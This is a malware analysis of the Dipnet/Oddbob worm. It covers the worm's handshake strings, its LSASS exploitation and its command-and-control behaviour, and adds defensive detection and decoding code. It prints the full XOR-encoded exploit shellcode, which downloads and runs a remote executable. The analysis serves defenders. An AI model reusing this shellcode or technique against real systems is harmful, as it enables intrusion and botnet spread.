Dipnet/Oddbob Worm Analysis

Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 vulnerability that Sasser was based on. Its purpose is to spread an IRC DDoS bot. Later variants of Dipnet are attracting some interest due to unusual traffic patterns on TCP port 11768 (and later on TCP port 15118).

Analysis

Before Dipnet exploits a host, it first attempts to connect to that host on a chosen TCP port (11768 or 15118) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it responds with a marker string hard-coded in the body of the worm. The latest variant we've seen responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then closes the connection. This exchange allows the worm to avoid infecting hosts that are already running the latest version of the worm software.
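The probe/reply exchange described above, written as detection logic that runs over captured TCP segments so that both the scanning hosts and the already-infected listeners on a monitored network can be picked out. This is an added example, not code from the SecureWorks analysis; the two strings and the two ports are the ones given in the text, while the host addresses and the segment records are constructed sample data.

```python
# Added example (not from the write-up): flag Dipnet's pre-infection
# handshake in captured TCP payloads. A host that sends the probe is
# itself running the worm; a host that answers with the marker is
# running the latest variant and is skipped by the scanner.

PROBE = b"__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123"
REPLY = b"__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3"
DIPNET_PORTS = {11768, 15118}


def classify_segment(src, sport, dst, dport, payload):
    """Label one TCP segment, or return None if it is unremarkable.

    'probe' - client -> listener on 11768/15118 carrying the probe string
    'reply' - listener -> client carrying the infected-host marker
    """
    if dport in DIPNET_PORTS and payload.startswith(PROBE):
        return "probe"
    if sport in DIPNET_PORTS and payload.startswith(REPLY):
        return "reply"
    return None


def summarise(segments):
    """Aggregate labelled segments into (scanning hosts, replying hosts)."""
    scanners, infected = set(), set()
    for src, sport, dst, dport, payload in segments:
        label = classify_segment(src, sport, dst, dport, payload)
        if label == "probe":
            scanners.add(src)
        elif label == "reply":
            infected.add(src)
    return scanners, infected


# Constructed sample capture (src, sport, dst, dport, payload):
# 10.0.0.5 probes two hosts; 10.0.0.9 is already infected and answers
# with the marker; 10.0.0.7 has nothing listening; 10.0.0.8 is benign.
SAMPLE = [
    ("10.0.0.5", 41000, "10.0.0.9", 11768, PROBE),
    ("10.0.0.9", 11768, "10.0.0.5", 41000, REPLY),
    ("10.0.0.5", 41001, "10.0.0.7", 15118, PROBE),
    ("10.0.0.7", 15118, "10.0.0.5", 41001, b""),  # connection refused, no data
    ("10.0.0.8", 52000, "10.0.0.9", 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    scanners, infected = summarise(SAMPLE)
    print("hosts sending the probe:", sorted(scanners))
    print("hosts answering with the marker:", sorted(infected))
```

Matching on the full probe and reply strings rather than on the port alone keeps ordinary traffic that happens to use 11768 or 15118 out of the result; the port check is still applied so that the same strings seen elsewhere (for example, in a copy of this analysis being transferred) do not trigger.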

If the worm ascertains that the host is not already infected, or is not running the latest version, it will then attempt to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting, with the bulk of the code XORed by 0xFF in order to obfuscate the payload strings and prevent null bytes from prematurely terminating the payload while being copied in memory by the affected host. When decrypted, the shellcode continues running and downloads the worm executable from a remote webserver and runs it.

The shellcode as received is as follows:

00000000  eb 00 06 00 eb 00 06 00  9b 00 2a 00 f9 00 77 00  |ë...ë.....*.ù.w.|
00000010  90 00 90 00 90 00 90 00  90 00 90 00 90 00 90 00  |................|
00000020  90 00 33 00 c0 00 f7 00  d0 00 8b 00 fb 00 f2 00  |..3.À.÷.Ð...û.ò.|
00000030  af 00 57 00 33 00 c9 00  b1 00 b2 00 90 00 90 00  |¯.W.3.É.±.².....|
00000040  90 00 90 00 80 00 37 00  ff 00 47 00 e2 00 fa 00  |......7.ÿ.G.â.ú.|
00000050  8b 00 ef 00 4d 00 5f 00  57 00 b8 00 30 00 fa 00  |..ï.M._.W.¸.0.ú.|
00000060  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
00000070  be 00 f8 00 ff 00 ff 00  ff 00 f7 00 d6 00 33 00  |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000090  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
000000a0  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 4e 00  |ÿ.Ð.>...D.µ.ý.N.|
000000b0  0b 00 f6 00 75 00 e3 00  33 00 c0 00 8b 00 c8 00  |..ö.u.ã.3.À...È.|
000000c0  f7 00 d1 00 f2 00 ae 00  57 00 b8 00 30 00 fa 00  |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
000000e0  be 00 f5 00 ff 00 ff 00  ff 00 f7 00 d6 00 ba 00  |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0  f8 00 ff 00 ff 00 ff 00  f7 00 d2 00 52 00 33 00  |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000110  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
00000120  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 5a 00  |ÿ.Ð.>...D.µ.ý.Z.|
00000130  52 00 4e 00 3b 00 f2 00  75 00 e1 00 33 00 c0 00  |R.N.;.ò.u.á.3.À.|
00000140  8b 00 c8 00 f7 00 d1 00  f2 00 ae 00 90 00 90 00  |..È.÷.Ñ.ò.®.....|
00000150  33 00 c0 00 66 00 48 00  d1 00 e0 00 33 00 d2 00  |3.À.f.H.Ñ.à.3.Ò.|
00000160  50 00 52 00 ff 00 55 00  01 00 8b 00 f0 00 33 00  |P.R.ÿ.U.....ð.3.|
00000170  d2 00 52 00 52 00 52 00  52 00 57 00 ff 00 55 00  |Ò.R.R.R.R.W.ÿ.U.|
00000180  25 00 33 00 d2 00 52 00  52 00 52 00 52 00 8b 00  |%.3.Ò.R.R.R.R...|
00000190  d7 00 90 00 90 00 90 00  52 00 50 00 ff 00 55 00  |×.......R.P.ÿ.U.|
000001a0  21 00 57 00 33 00 d2 00  66 00 4a 00 d1 00 e2 00  |!.W.3.Ò.f.J.Ñ.â.|
000001b0  52 00 56 00 50 00 ff 00  55 00 1d 00 90 00 90 00  |R.V.P.ÿ.U.......|
000001c0  90 00 33 00 d2 00 52 00  b8 00 f4 00 ff 00 ff 00  |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0  90 00 90 00 52 00 ff 00  55 00 19 00 ff 00 37 00  |....R.ÿ.U...ÿ.7.|
000001f0  56 00 50 00 8b 00 d8 00  ff 00 55 00 15 00 53 00  |V.P...Ø.ÿ.U...S.|
00000200  ff 00 55 00 11 00 90 00  90 00 90 00 90 00 90 00  |ÿ.U.............|
00000210  33 00 d2 00 42 00 52 00  b8 00 f4 00 ff 00 ff 00  |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230  90 00 90 00 90 00 52 00  ff 00 55 00 09 00 90 00  |......R.ÿ.U.....|
00000240  33 00 d2 00 f7 00 d2 00  c1 00 e2 00 04 00 52 00  |3.Ò.÷.Ò.Á.â...R.|
00000250  ff 00 55 00 05 00 eb 00  f3 00 90 00 87 00 db 00  |ÿ.U...ë.ó.....Û.|
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00  |ÿ.ÿ.ÿ.ÿ.´.º.­.±.|
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00  |º.³.Ì.Í.Ñ.».³.³.|
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00  |ÿ. .............|
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00  |ÿ. .............|
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00  |ÿ.¨.....º.......|
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00  |ÿ.¬.........ÿ.¸.|
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00  |..........¾.....|
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00  |....ÿ.¨.¶.±.¶.±.|
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00  |º.«.Ñ.».³.³.ÿ.¶.|
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00  |..............°.|
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00  |......¾.ÿ.¶.....|
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00  |..........°.....|
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00  |..ª.....¾.ÿ.¶...|
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00  |............­...|
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00  |....¹.......ÿ...|
00000370  8b 00 8b 00 8f 00 c5 00  d0 00 d0 00 9e 00 8b 00  |......Å.Ð.Ð.....|
00000380  93 00 9e 00 91 00 8b 00  9c 00 90 00 92 00 92 00  |................|
00000390  9a 00 8d 00 9c 00 9a 00  d1 00 9c 00 90 00 92 00  |........Ñ.......|
000003a0  d0 00 8c 00 8b 00 8a 00  99 00 99 00 d1 00 9a 00  |Ð...........Ñ...|
000003b0  87 00 9a 00 ff 00 88 00  96 00 91 00 9c 00 9a 00  |....ÿ...........|
000003c0  8d 00 d1 00 9a 00 87 00  9a 00 ff 00 88 00 88 00  |..Ñ.......ÿ.....|
000003d0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003e0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003f0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000400  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000410  88 00 88 00 88 00 88 00  88 00 88 00 ff 00        |............ÿ.|

The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:

http://atl<blocked>rce.com/stuff.exe
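To show how the API names above are recovered from the dump, here is a small decoder added for this write-up (it is not part of the original analysis). It works from the facts the text gives: the dump shows every shellcode byte followed by 0x00 (the buffer arrives as wide characters), and the body is XORed with 0xFF. The embedded input is copied from the dump above at offsets 0x260 to 0x36f, the region holding the library and API names, with the ASCII column dropped; it stops just before the download URL, which the analysis redacts.

```python
# Added example (not from the write-up): parse the hexdump, drop the 0x00
# padding that follows every byte, undo the XOR-0xFF encoding and list the
# NUL-terminated strings that the shellcode resolves at run time.

# Offsets 0x260-0x36f of the dump above, hex columns only (the ASCII
# column is dropped). The slice ends before the redacted download URL.
DUMP = """
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00
"""


def parse_hexdump(text):
    """Turn hexdump lines (offset, hex bytes, optional |ascii| column) into bytes."""
    out = bytearray()
    for line in text.strip().splitlines():
        fields = line.split("|")[0].split()
        out.extend(int(h, 16) for h in fields[1:])  # fields[0] is the offset
    return bytes(out)


def unwiden(raw):
    """Drop the 0x00 that follows every byte of the wide-character buffer."""
    if any(raw[1::2]):
        raise ValueError("odd-position bytes are not all zero; not a widened buffer")
    return raw[0::2]


def decrypt(body, key=0xFF):
    """Undo the shellcode's single-byte XOR (0xFF per the analysis)."""
    return bytes(b ^ key for b in body)


def recover_strings(text):
    """Return the complete NUL-terminated strings hidden in the XORed region."""
    plain = decrypt(unwiden(parse_hexdump(text)))
    parts = plain.split(b"\x00")[:-1]  # last piece is an unterminated fragment
    return [p.decode("latin-1") for p in parts if p]


if __name__ == "__main__":
    for s in recover_strings(DUMP):
        print(s)
```

Note that the XOR key turns the NUL separators between strings into 0xFF on the wire, which is exactly why the encoding prevents the payload from being cut short while it is copied; the same trick is what makes the 0xFF bytes stand out as string boundaries once the key is known.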

The worm executable sets up its own listener on the specified port in order to communicate with future instances of the worm that may attempt to exploit the host. It also communicates with two different websites in order to receive additional commands. Commands can be one of the following:

DIE:            delete worm registry keys and exit
DOWNLOAD:       download a file via HTTP
EXEC:           execute a file
RESET:          restart the scanner with a new batch of IP address masks
APPEND:         insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.

At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.
